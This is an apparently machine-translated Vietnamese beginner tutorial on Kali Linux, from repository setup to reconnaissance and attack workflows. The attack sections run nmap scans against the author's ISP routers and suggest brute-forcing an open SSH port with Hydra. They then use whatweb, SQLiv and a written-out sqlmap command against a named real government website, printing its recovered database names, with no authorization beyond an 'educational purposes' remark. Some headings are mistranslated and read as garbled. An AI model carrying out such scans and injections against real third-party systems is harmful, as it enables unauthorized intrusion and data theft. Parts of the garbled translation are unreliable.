Hướng dẫn về Kali Linux

Kali Linux Tutorial



Nếu bạn là một chuyên gia hoặc ít nhất là quen thuộc với Linux, các lệnh và môi trường, vừa mới cài đặt Kali Linux trên máy của mình, muốn trở thành Bậc thầy về Kali Linux hoặc một Hacker đạo đức thì bạn đã đến đúng chỗ. Trong bài viết này, tôi sẽ giới thiệu hướng dẫn về Kali Linux cho người dùng Linux chưa quen thuộc với Kali và giúp bạn bắt đầu về một số kỹ thuật cơ bản được sử dụng để hack và kiểm tra bảo mật khi sử dụng Kali.

Kali Linux là gì?

Kali Linux, ( phát hành lần đầu vào ngày 13 tháng 3 năm 2013 ) được chính thức gọi là BackTrack, được phát triển bởi công ty bảo mật Offensive Security, là một bản phân phối tập trung vào pháp y và bảo mật dựa trên nhánh Thử nghiệm của Debian. Kali Linux được thiết kế với tính năng kiểm tra thâm nhập, khôi phục dữ liệu và phát hiện mối đe dọa. Dự án đã chuyển sang mô hình phát hành luân phiên vào đầu năm nay với nỗ lực cung cấp nhiều tiện ích bảo mật cập nhật hơn cho người dùng của phân phối. Kali Linux miễn phí và sẽ luôn như vậy. Nó có hơn 600 công cụ kiểm tra thâm nhập bao gồm.







Tại sao lại sử dụng Kali Linux? Là nó phù hợp với bạn?

Kali Linux đã trở nên phổ biến gần đây. Và có một lý do đằng sau đó. Hacking đã trở lại như một điều thú vị trong văn hóa đại chúng và điều này có thể được quy cho loạt phim truyền hình Mr. Robot. Sự nổi tiếng của Mr. Robot đã giúp Kali Linux có được người dùng mới. Những người hầu như không có bất kỳ kiến ​​thức nào về Linux hoặc bất kỳ thứ gì liên quan đến bảo mật máy tính hiện đang cố gắng sử dụng Kali làm bản phân phối Linux chính của họ.



Phân phối thử nghiệm thâm nhập tiên tiến nhất của chúng tôi, từ trước đến nay. - Nhà phát triển Kali Linux. (Nó được viết trên trang chính của Kali.org ở đầu trang.) Bạn nhận được gì từ tuyên bố đó? Bạn có nhận thấy điều này không: APTD (Phân phối thử nghiệm thâm nhập nâng cao)? Không có thuật ngữ hack ở đây theo nghĩa đen. Kali Linux cũng giống như các bản phân phối Linux khác. Nói một cách đơn giản, đó là một bản phân phối Linux được đóng gói với các công cụ liên quan đến bảo mật và nhắm mục tiêu đến các chuyên gia bảo mật mạng và máy tính. Tuy nhiên, việc sử dụng Kali Linux chỉ tập trung vào bảo mật và pháp y.



Bản phân phối Linux không gì khác hơn là một gói chứa nhân Linux, một tập hợp các tiện ích và ứng dụng cốt lõi và một số cài đặt mặc định. Vì vậy, Kali Linux không cung cấp một cái gì đó độc đáo theo nghĩa là hầu hết các công cụ được cung cấp có thể được cài đặt trên bất kỳ bản phân phối Linux nào.





Kali Linux được thiết kế đặc biệt để đáp ứng các yêu cầu kiểm tra thâm nhập chuyên nghiệp và kiểm tra bảo mật. Nó nhắm đến một nhóm nhỏ người dùng Linux cụ thể. Pentesters, hacker, v.v. Đây không phải là bản phân phối được khuyến nghị nếu bạn đang mong đợi Kali cho máy tính để bàn Linux mục đích chung để phát triển, thiết kế web, chơi game, văn phòng, v.v. Kali có thể mang đến cho bạn một số thách thức, ngay cả khi bạn là người dùng Linux có kinh nghiệm .

NHỮNG VIỆC CẦN LÀM SAU KHI CÀI ĐẶT KALI LINUX

Sau khi cài đặt Kali Linux, bạn có thể tự hỏi phải làm gì tiếp theo với điều này, phải không ?. Mọi người đều phải đối mặt với vấn đề này, đừng lo lắng.



BƯỚC 1: THIẾT LẬP BÁO CÁO

Thứ nhất, bạn có thể đã biết điều này, nhưng điều quan trọng là phải đặt kho lưu trữ một cách chính xác. Như tôi đã nói, mô hình phát hành chính thức của Kali Linux đang nỗ lực cung cấp nhiều tiện ích bảo mật cập nhật hơn cho người dùng của bản phân phối. Nói chung, nếu bạn mới cài đặt Kali Linux, thì kho lưu trữ đang tham chiếu đến phương tiện bạn đang sử dụng để cài đặt. Để khắc phục điều này, bạn cần thay đổi kho lưu trữ thành kho lưu trữ Kali Linux chính thức. Tệp được yêu cầu nằm dưới /etc/apt/sources.list . Mở tệp bằng trình chỉnh sửa văn bản trên bàn phím và thay thế kho lưu trữ mặc định thành kho lưu trữ Kali Rolling chính thức này:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

BƯỚC 2: CẬP NHẬT VÀ NÂNG CẤP LINUX KALI CỦA BẠN

Sau khi cập nhật và nâng cấp hệ thống của bạn, hãy đồng bộ hóa Kali Linux của bạn lên phiên bản mới nhất. Để làm điều đó, hãy mở thiết bị đầu cuối và nhập:

apt update -y && apt upgrade -y && apt dist-upgrade 

Lệnh cập nhật apt tải xuống và tìm nạp gói liệt kê thông tin từ các kho lưu trữ và cập nhật chúng để nhận thông tin về các phiên bản mới nhất của gói và các phụ thuộc của chúng.

Lệnh nâng cấp apt tải xuống và cài đặt phiên bản mới hơn của gói các gói Kali Linux đã cài đặt miễn là nó không có lỗi về các phần phụ thuộc.

Bản nâng cấp apt sẽ cập nhật tất cả các gói lên phiên bản mới nhất hiện có. Và cũng có thể cài đặt và loại bỏ các phần phụ thuộc khi cần thiết (rõ ràng là cài đặt các phần phụ thuộc để đáp ứng các gói, nhưng cũng loại bỏ các phần phụ thuộc đã trở thành mồ côi nếu một gói đã được cập nhật không còn cần phần phụ thuộc nữa.

KHÁI NIỆM VỀ KIỂM TRA XỬ PHẠT CƠ BẢN VỚI KALI LINUX

Sau khi bạn đã thực hiện thành công các bước đó, có ba điều chính bạn có thể làm với Kali Linux dựa trên hệ thống được nhắm mục tiêu bao gồm:

  1. Tấn công mạng không dây - Tấn công Wi-Fi, Lừa đảo, Đầu độc ARP, v.v.
  2. Hacking ứng dụng web - SQL Injection, Cross-Site Request Forgery (CSRF), Web Phising, v.v.
  3. Lấy cắp thiết bị - Khai thác máy mục tiêu để giành quyền kiểm soát nó.

Tôi không bao gồm việc hack IoT, điều đó không có nghĩa là Kali Linux không có khả năng cho mục đích đó. Tuy nhiên, theo nghĩa đen thì nó cũng có thể thuộc về Device Hacking. Vì thiết bị có hình thức và hình thức bên ngoài. Trong hướng dẫn này, tôi đã trình bày những kiến ​​thức cơ bản về chúng. Vì Kali Linux rất lớn, nó không phù hợp với một bài viết!

Bạn cũng cần biết, Quy trình hoặc quy trình Kiểm tra Thâm nhập. Họ đang:

  1. Trinh sát - Thu thập thông tin
  2. Quét
  3. Hoạt động
  4. Sau khai thác

HACK MẠNG KHÔNG DÂY VỚI KALI LINUX

Về vấn đề hack mạng không dây, nạn nhân có thể khác nhau. Bởi vì, mạng không dây bao gồm một số thứ, chẳng hạn như ISP (Nhà cung cấp dịch vụ Internet), bộ định tuyến và các đối tác của nó (modem, trung tâm, bộ chuyển mạch, v.v.) và máy khách (người dùng, camera quan sát, máy tính từ xa, v.v.). Họ cũng có những khả năng dễ bị tổn thương.

Internet là một tập hợp lớn và phức tạp của phần cứng mạng, được kết nối với nhau bằng các cổng. Theo dõi lộ trình mà các gói của bạn đi theo là điều quan trọng để biết cách bạn tiếp cận một tên máy chủ hoặc địa chỉ IP mục tiêu nhất định.

Kali Linux có một công cụ tích hợp có tên là Traceroute. Traceroute sử dụng thời gian giao thức IP cho trường trực tiếp và cố gắng lấy ra phản hồi ICMP TIME_EXCEEDED từ mỗi cổng dọc theo đường dẫn đến một số máy chủ. Các nỗ lực theo dõi để theo dõi lộ trình mà một gói IP sẽ đi theo một số máy chủ internet bằng cách khởi chạy các gói thăm dò với một TTL nhỏ (thời gian tồn tại) sau đó lắng nghe trong thời gian ICMP vượt quá thời gian trả lời từ một cổng. Tôi sẽ cung cấp cho bạn và ví dụ về cách theo dõi một bộ định tuyến ISP được sử dụng để xử lý kết nối của chúng tôi bằng cách sử dụng Traceroute.

1. Sự công nhận

Thu thập thông tin là bước khởi đầu quan trọng nhất, đừng bỏ lỡ bước này. Trong bước này, mục đích của chúng tôi là thu được nhiều thông tin hữu ích nhất có thể mà chúng tôi có thể nhận được và sau đó thông tin này được sử dụng cho các bước tiếp theo.

Đầu tiên, mở một thiết bị đầu cuối và nhập lệnh này để bắt đầu dò đường đến trang web, trong trường hợp này, tôi đặt trang web thành google.com.

traceroute google.com 

Ảnh chụp màn hình theo dõi

2. Quét

Khi chúng tôi khởi chạy các lệnh, nó sẽ liệt kê nơi gói tin của chúng tôi đi theo trình tự. Như bạn có thể thấy ở trên, tôi có 3 bước nhảy mà một trong số chúng là máy chủ ISP của tôi. IP đầu tiên trong danh sách là bộ định tuyến của tôi, hoạt động như một cổng vào. Và hai trong số chúng tiếp theo thuộc về ISP của tôi. Bây giờ, hãy kiểm tra dịch vụ mà họ đang chạy bằng Nmap. Vì vậy, các mục tiêu chúng tôi sẽ quét là 10.152.192.110.13.223.102 . Trong terminal, tôi đã chạy lệnh sau:

nmap -v -sS [IP Target] -Pn 

Hãy chia nhỏ đối số của lệnh:

-v = Bật chế độ chi tiết

-sS = Sử dụng kỹ thuật quét TCP SYN

-Pn = Coi tất cả các máy chủ là trực tuyến - bỏ qua việc khám phá máy chủ

Và đây là kết quả chúng tôi nhận được.

ảnh chụp màn hình nmap 2

Đáng buồn thay, tất cả các cổng trên 10.152.192.1 được lọc, điều đó có nghĩa là tất cả các kết nối TCP đến đều bị chặn bởi IDS hoặc Tường lửa trên IP này. Bây giờ, chúng ta hãy quét một lần nữa đến mục tiêu thứ hai.

ảnh chụp màn hình nmap 1

3. Hoạt động

Trong quy trình này, tôi không có ý định tiến hành khai thác thực sự, thay vào đó tôi chỉ cho bạn cách thực hiện. Dựa trên kết quả quét Nmap ở trên, chúng tôi biết rằng IP này có máy chủ SSH đang chạy trên cổng 22 và nó đang mở. Nó được mở để được vũ phu, haha! Chúng tôi đã tìm thấy lỗ hổng, máy chủ SSH này là lỗ hổng có thể xảy ra mà chúng tôi có thể cố gắng truy cập. Có một số công cụ trong Kali Linux hỗ trợ các cuộc tấn công bruteforce hoặc từ điển chống lại giao thức SSH. Một trong những phổ biến nhất và mạnh mẽ là Hydra.

Được rồi, đó là quy trình cơ bản tiến hành kiểm tra thâm nhập đối với một máy chủ được nhắm mục tiêu, trong ví dụ của chúng tôi ở đây là máy chủ ISP của tôi.

HACK ỨNG DỤNG WEB VỚI KALI LINUX

Trên thực tế, nếu bạn đam mê điều này, bạn có thể thiết lập môi trường hack của mình bằng cách cài đặt DWVA (Ứng dụng web dễ bị tổn thương) vào Kali Linux của bạn. Nó là một ứng dụng web PHP / MySQL có nhiều lỗ hổng dễ bị tấn công. Mục tiêu chính của nó là hỗ trợ các chuyên gia bảo mật kiểm tra kỹ năng và công cụ của họ trong môi trường pháp lý, đồng thời giúp các nhà phát triển web hiểu rõ hơn về các quy trình bảo mật các ứng dụng web. Bạn có thể tải DWVA miễn phí trên Github tại đây: https://github.com/ethicalhack3r/DVWA.

Bây giờ, tôi sẽ chỉ cho bạn cách thực hiện Hacking ứng dụng web trên một trang web thực. Nhưng, hãy hứa với tôi rằng nó chỉ giới hạn trong mục đích giáo dục. Chúng tôi sẽ mô phỏng một cuộc tấn công thực trên trang web thực bằng cách sử dụng SQL injection.

Điều kiện tiên quyết

Các công cụ được bảo hiểm:

- Whatweb (cài đặt sẵn)

- Nmap (cài đặt sẵn)

- SQLiv (cài đặt thủ công)

- SQLMap (cài đặt sẵn)

Chúng tôi cần thêm một công cụ bổ sung có sẵn trên Github tại đây: https://github.com/Hadesy2k/sqliv, trước tiên hãy cài đặt nó vào Kali Linux của chúng tôi. Công cụ này có tên là SQLiv, có thể thực hiện quét được nhắm mục tiêu bằng cách cung cấp miền cụ thể (có thu thập thông tin). Nhập thiết bị đầu cuối:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Mục tiêu: www.trenggalekkab.go.id

1. Sự công nhận

Thu thập càng nhiều thông tin hữu ích mà chúng tôi có thể nhận được. Chúng tôi có thể mở trang web và phát hiện ứng dụng nào đang chạy trên trang web này. Đầu tiên, hãy kiểm tra loại trang web đó là. Chúng tôi sẽ sử dụng whatweb để làm điều đó.

whatweb www.trenggalekkab.go.id 

Ảnh chụp màn hình web gì

Như bạn có thể thấy kết quả ở trên, mục tiêu nằm ở Indonesia. Nó đang chạy Apache v2.2.27 trên máy chủ web của nó và cũng có PHP v5.4.31 , nó có một địa chỉ IP 103.247.21.142 . Được rồi, hãy ghi lại điều đó. Bạn có thể cần phải truy cập trang web của nó, tìm kiếm tệp hoặc trang được tạo, tham số URL hoặc thậm chí biểu mẫu đăng nhập. Hiện tại, chúng tôi cần địa chỉ IP đó cho bước tiếp theo là quét.

2. Quét

Giống như trước đây, chúng tôi sử dụng Nmap một lần nữa để quét các cổng và dịch vụ nào đang chạy trên mục tiêu.

nmap -v -sS 103.247.21.142 

Và đây là kết quả chúng tôi nhận được:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Có rất nhiều cổng mở xử lý từng dịch vụ trên mục tiêu, nhưng cái trông bắt mắt là dịch vụ mysql trên cổng 3306. Nó được chỉ ra rằng trang web này đang sử dụng mysql để quản lý thông tin của họ trong cơ sở dữ liệu. Sau đó, tôi tự hỏi liệu có bất kỳ lỗ hổng SQL Injection nào trên trang web này không. Vì vậy, tôi quét lại trang web bằng cách sử dụng SQLiv mà chúng tôi vừa cài đặt. Tôi đã gõ lệnh:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

Chúng tôi đã tìm thấy 2 URL dễ bị tấn công SQL trên trang web này. Hãy ghi lại các URL đó.

3. Hoạt động

Được rồi, chúng tôi đã có các URL dễ bị tấn công của SQL và sẵn sàng để thực thi. Để làm điều đó, chúng tôi sẽ sử dụng SQLMap. Cú pháp là:

sqlmap [Vulnerable URL] --dbs 

Lệnh sẽ giống như sau:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Đối số –dbs là để yêu cầu SQLMap lấy cơ sở dữ liệu đích. Đây là kết quả mà chúng tôi nhận được:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap đã tìm thấy 2 cơ sở dữ liệu, nhưng chỉ một trong số đó chứa dữ liệu nhạy cảm, chẳng hạn như tài khoản thông tin đăng nhập quản trị viên. Đó là trên trengkab_trg. Sau khi chúng tôi đã tìm thấy cơ sở dữ liệu, vẫn còn một bước nữa chúng tôi nên làm. Đó là tìm các bảng và cột và bước cuối cùng là kết xuất dữ liệu. Tôi sẽ không chỉ cho bạn cách ở đây trong phần này, bằng cách sử dụng mục tiêu này. Ít nhất bạn biết ý tưởng cơ bản về chu kỳ tấn công và sử dụng một số công cụ.

THIẾT BỊ HACKING

Trong một bài viết trong tương lai trên trang web này, chúng tôi sẽ đề cập đến việc hack thiết bị, hãy chú ý theo dõi. Như một lời cảnh báo trước, bạn sẽ muốn đảm bảo rằng bạn biết một số Python cho việc này.